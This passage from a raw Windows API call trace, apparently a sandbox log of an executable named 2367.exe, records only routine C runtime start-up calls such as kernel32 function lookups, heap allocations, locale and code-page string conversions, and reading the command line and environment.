returned 0x31e0000 [0060.414] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0060.414] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0060.414] GetProcAddress (hModule=0x76d30000, lpProcName="FlsFree") returned 0x76d4359f [0060.415] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0060.415] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0060.415] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionEx") returned 0x76d44d28 [0060.415] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventExW") returned 0x76dc410b [0060.415] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSemaphoreExW") returned 0x76dc4195 [0060.415] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadStackGuarantee") returned 0x76d4d31f [0060.415] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThreadpoolTimer") returned 0x76d5ee7e [0060.415] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadpoolTimer") returned 0x77c8441c [0060.415] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x77cac50e [0060.415] GetProcAddress (hModule=0x76d30000, lpProcName="CloseThreadpoolTimer") returned 0x77cac381 [0060.416] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThreadpoolWait") returned 0x76d5f088 [0060.416] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadpoolWait") returned 0x77c905d7 [0060.416] GetProcAddress (hModule=0x76d30000, lpProcName="CloseThreadpoolWait") returned 0x77caca24 [0060.416] GetProcAddress (hModule=0x76d30000, lpProcName="FlushProcessWriteBuffers") returned 0x77c60b8c [0060.416] GetProcAddress (hModule=0x76d30000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x77d1fde8 [0060.416] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessorNumber") returned 0x77cb1e1d [0060.416] GetProcAddress (hModule=0x76d30000, lpProcName="GetLogicalProcessorInformation") returned 0x76dc4761 [0060.416] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSymbolicLinkW") returned 0x76dbcd11 [0060.416] GetProcAddress (hModule=0x76d30000, lpProcName="SetDefaultDllDirectories") returned 0x0 [0060.416] GetProcAddress (hModule=0x76d30000, lpProcName="EnumSystemLocalesEx") returned 0x76dc424f [0060.417] GetProcAddress (hModule=0x76d30000, lpProcName="CompareStringEx") returned 0x76dc46b1 [0060.417] GetProcAddress (hModule=0x76d30000, lpProcName="GetDateFormatEx") returned 0x76dd6676 [0060.417] GetProcAddress (hModule=0x76d30000, lpProcName="GetLocaleInfoEx") returned 0x76dc4751 [0060.417] GetProcAddress (hModule=0x76d30000, lpProcName="GetTimeFormatEx") returned 0x76dd65f1 [0060.417] GetProcAddress (hModule=0x76d30000, lpProcName="GetUserDefaultLocaleName") returned 0x76dc47c1 [0060.417] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidLocaleName") returned 0x76dc47e1 [0060.417] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringEx") returned 0x76dc47f1 [0060.417] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentPackageId") returned 0x0 [0060.417] GetProcAddress (hModule=0x76d30000, lpProcName="GetTickCount64") returned 0x76d5eee0 [0060.417] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileInformationByHandleExW") returned 0x0 [0060.418] GetProcAddress (hModule=0x76d30000, lpProcName="SetFileInformationByHandleW") returned 0x0 [0060.418] RtlAllocateHeap (HeapHandle=0x31e0000, Flags=0x8, Size=0x3bc) returned 0x31ff240 [0060.418] GetCurrentThreadId () returned 0x618 [0060.418] RtlAllocateHeap (HeapHandle=0x31e0000, Flags=0x0, Size=0x18) returned 0x31f2090 [0060.418] RtlAllocateHeap (HeapHandle=0x31e0000, Flags=0x8, Size=0x800) returned 0x31ff608 [0060.418] GetStartupInfoW (in: lpStartupInfo=0x18f2d0 | out: lpStartupInfo=0x18f2d0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2367.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x425128, hStdOutput=0xf4ca129, hStdError=0x58)) [0060.418] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0060.418] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0060.418] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0060.418] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2367.exe\" " [0060.418] GetEnvironmentStringsW () returned 0x31ffe10* [0060.419] RtlAllocateHeap (HeapHandle=0x31e0000, Flags=0x0, Size=0xaca) returned 0x32008e8 [0060.419] FreeEnvironmentStringsW (penv=0x31ffe10) returned 1 [0060.419] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x511130, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2367.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\2367.exe")) returned 0x2e [0060.419] RtlAllocateHeap (HeapHandle=0x31e0000, Flags=0x0, Size=0x66) returned 0x31ffe10 [0060.419] RtlAllocateHeap (HeapHandle=0x31e0000, Flags=0x8, Size=0x98) returned 0x31ffe80 [0060.419] RtlAllocateHeap (HeapHandle=0x31e0000, Flags=0x8, Size=0x3e) returned 0x31f5660 [0060.419] RtlAllocateHeap (HeapHandle=0x31e0000, Flags=0x8, Size=0x6c) returned 0x31fff20 [0060.419] RtlAllocateHeap (HeapHandle=0x31e0000, Flags=0x8, Size=0x6e) returned 0x31fff98 [0060.419] RtlAllocateHeap (HeapHandle=0x31e0000, Flags=0x8, Size=0x78) returned 0x31f2c00 [0060.419] RtlAllocateHeap (HeapHandle=0x31e0000, Flags=0x8, Size=0x62) returned 0x3200010 [0060.419] RtlAllocateHeap (HeapHandle=0x31e0000, Flags=0x8, Size=0x2e) returned 0x31faf50 [0060.419] RtlAllocateHeap (HeapHandle=0x31e0000, Flags=0x8, Size=0x48) returned 0x31f6b08 [0060.419] RtlAllocateHeap (HeapHandle=0x31e0000, Flags=0x8, Size=0x28) returned 0x31fa910 [0060.419] RtlAllocateHeap (HeapHandle=0x31e0000, Flags=0x8, Size=0x1a) returned 0x31fee78 [0060.419] RtlAllocateHeap (HeapHandle=0x31e0000, Flags=0x8, Size=0x4a) returned 0x3200080 [0060.419] RtlAllocateHeap (HeapHandle=0x31e0000, Flags=0x8, Size=0x72) returned 0x31f2c80 [0060.419] RtlAllocateHeap (HeapHandle=0x31e0000, Flags=0x8, Size=0x30) returned 0x31faf88 [0060.419] RtlAllocateHeap (HeapHandle=0x31e0000, Flags=0x8, Size=0x2e) returned 0x31fafc0 [0060.419] RtlAllocateHeap (HeapHandle=0x31e0000, Flags=0x8, Size=0x1c) returned 0x31feea0 [0060.419] RtlAllocateHeap (HeapHandle=0x31e0000, Flags=0x8, Size=0xd2) returned 0x32000d8 [0060.419] RtlAllocateHeap (HeapHandle=0x31e0000, Flags=0x8, Size=0x7c) returned 0x32001b8 [0060.419] RtlAllocateHeap (HeapHandle=0x31e0000, Flags=0x8, Size=0x36) returned 0x3200240 [0060.419] RtlAllocateHeap (HeapHandle=0x31e0000, Flags=0x8, Size=0x3a) returned 0x31f56a8 [0060.419] RtlAllocateHeap (HeapHandle=0x31e0000, Flags=0x8, Size=0x90) returned 0x3200280 [0060.419] RtlAllocateHeap (HeapHandle=0x31e0000, Flags=0x8, Size=0x24) returned 0x31fa940 [0060.420] RtlAllocateHeap (HeapHandle=0x31e0000, Flags=0x8, Size=0x30) returned 0x31faff8 [0060.420] RtlAllocateHeap (HeapHandle=0x31e0000, Flags=0x8, Size=0x36) returned 0x3200318 [0060.420] RtlAllocateHeap (HeapHandle=0x31e0000, Flags=0x8, Size=0x48) returned 0x31f6b58 [0060.420] RtlAllocateHeap (HeapHandle=0x31e0000, Flags=0x8, Size=0x52) returned 0x3200358 [0060.420] RtlAllocateHeap (HeapHandle=0x31e0000, Flags=0x8, Size=0x3c) returned 0x31f56f0 [0060.420] RtlAllocateHeap (HeapHandle=0x31e0000, Flags=0x8, Size=0x82) returned 0x32003b8 [0060.420] RtlAllocateHeap (HeapHandle=0x31e0000, Flags=0x8, Size=0x2e) returned 0x31fb030 [0060.420] RtlAllocateHeap (HeapHandle=0x31e0000, Flags=0x8, Size=0x1e) returned 0x31feec8 [0060.420] RtlAllocateHeap (HeapHandle=0x31e0000, Flags=0x8, Size=0x2c) returned 0x31fb068 [0060.420] RtlAllocateHeap (HeapHandle=0x31e0000, Flags=0x8, Size=0x54) returned 0x3200448 [0060.420] RtlAllocateHeap (HeapHandle=0x31e0000, Flags=0x8, Size=0x52) returned 0x32004a8 [0060.420] RtlAllocateHeap (HeapHandle=0x31e0000, Flags=0x8, Size=0x2a) returned 0x31fb0a0 [0060.420] RtlAllocateHeap (HeapHandle=0x31e0000, Flags=0x8, Size=0x3c) returned 0x31f5738 [0060.420] RtlAllocateHeap (HeapHandle=0x31e0000, Flags=0x8, Size=0x54) returned 0x3200508 [0060.420] RtlAllocateHeap (HeapHandle=0x31e0000, Flags=0x8, Size=0x24) returned 0x31fa970 [0060.420] RtlAllocateHeap (HeapHandle=0x31e0000, Flags=0x8, Size=0x30) returned 0x31fb0d8 [0060.420] RtlAllocateHeap (HeapHandle=0x31e0000, Flags=0x8, Size=0x8c) returned 0x3200568 [0060.420] HeapFree (in: hHeap=0x31e0000, dwFlags=0x0, lpMem=0x32008e8 | out: hHeap=0x31e0000) returned 1 [0060.421] RtlAllocateHeap (HeapHandle=0x31e0000, Flags=0x8, Size=0x800) returned 0x3200600 [0060.421] RtlAllocateHeap (HeapHandle=0x31e0000, Flags=0x8, Size=0x80) returned 0x3200e08 [0060.421] GetLastError () returned 0x0 [0060.421] SetLastError (dwErrCode=0x0) [0060.421] GetLastError () returned 0x0 [0060.421] SetLastError (dwErrCode=0x0) [0060.421] GetLastError () returned 0x0 [0060.421] SetLastError (dwErrCode=0x0) [0060.421] GetACP () returned 0x4e4 [0060.421] RtlAllocateHeap (HeapHandle=0x31e0000, Flags=0x0, Size=0x220) returned 0x3200e90 [0060.421] GetLastError () returned 0x0 [0060.421] SetLastError (dwErrCode=0x0) [0060.421] IsValidCodePage (CodePage=0x4e4) returned 1 [0060.421] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f2c4 | out: lpCPInfo=0x18f2c4) returned 1 [0060.421] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18ed8c | out: lpCPInfo=0x18ed8c) returned 1 [0060.421] GetLastError () returned 0x0 [0060.421] SetLastError (dwErrCode=0x0) [0060.421] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f1a0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0060.421] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f1a0, cbMultiByte=256, lpWideCharStr=0x18eb08, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0060.421] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchSrc=256, lpCharType=0x18eda0 | out: lpCharType=0x18eda0) returned 1 [0060.422] GetLastError () returned 0x0 [0060.422] SetLastError (dwErrCode=0x0) [0060.422] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f1a0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0060.422] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f1a0, cbMultiByte=256, lpWideCharStr=0x18ead8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0060.422] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0060.422] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchSrc=256, lpDestStr=0x18e8c8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0060.422] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchWideChar=256, lpMultiByteStr=0x18f0a0, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ¹ L\x0fÜò\x18", lpUsedDefaultChar=0x0) returned 256 [0060.422] GetLastError () returned 0x0 [0060.422] SetLastError (dwErrCode=0x0) [0060.422] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f1a0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0060.422] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f1a0, cbMultiByte=256, lpWideCharStr=0x18eaf8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿꥊBĀ") returned 256 [0060.422] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿꥊBĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0060.422] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿꥊBĀ", cchSrc=256, lpDestStr=0x18e8e8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ") returned 256 [0060.422] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ", cchWideChar=256, lpMultiByteStr=0x18efa0, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ¹ L\x0fÜò\x18", lpUsedDefaultChar=0x0) returned 256 [0060.422] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0060.422] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x431d5b) returned 0x40b5f8 [0060.423] RtlSizeHeap (HeapHandle=0x31e0000, Flags=0x0, MemoryPointer=0x3200e08) returned 0x80 [0060.423] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0060.423] RtlAllocateHeap (HeapHandle=0x31e0000, Flags=0x8, Size=0x1f) returned 0x31feef0 [0060.423] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x31feef0, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 31 [0060.423] GetLastError () returned 0x0 [0060.423] SetLastError (dwErrCode=0x0) [0060.423] RtlAllocateHeap (HeapHandle=0x31e0000, Flags=0x0, Size=0x4) returned 0x32010b8 [0060.423] RtlSizeHeap (HeapHandle=0x31e0000, Flags=0x0, MemoryPointer=0x32010b8) returned 0x4 [0060.423] RtlReAllocateHeap (Heap=0x31e0000, Flags=0x0, Ptr=0x32010b8, Size=0x8) returned 0x32010b8 [0060.423] 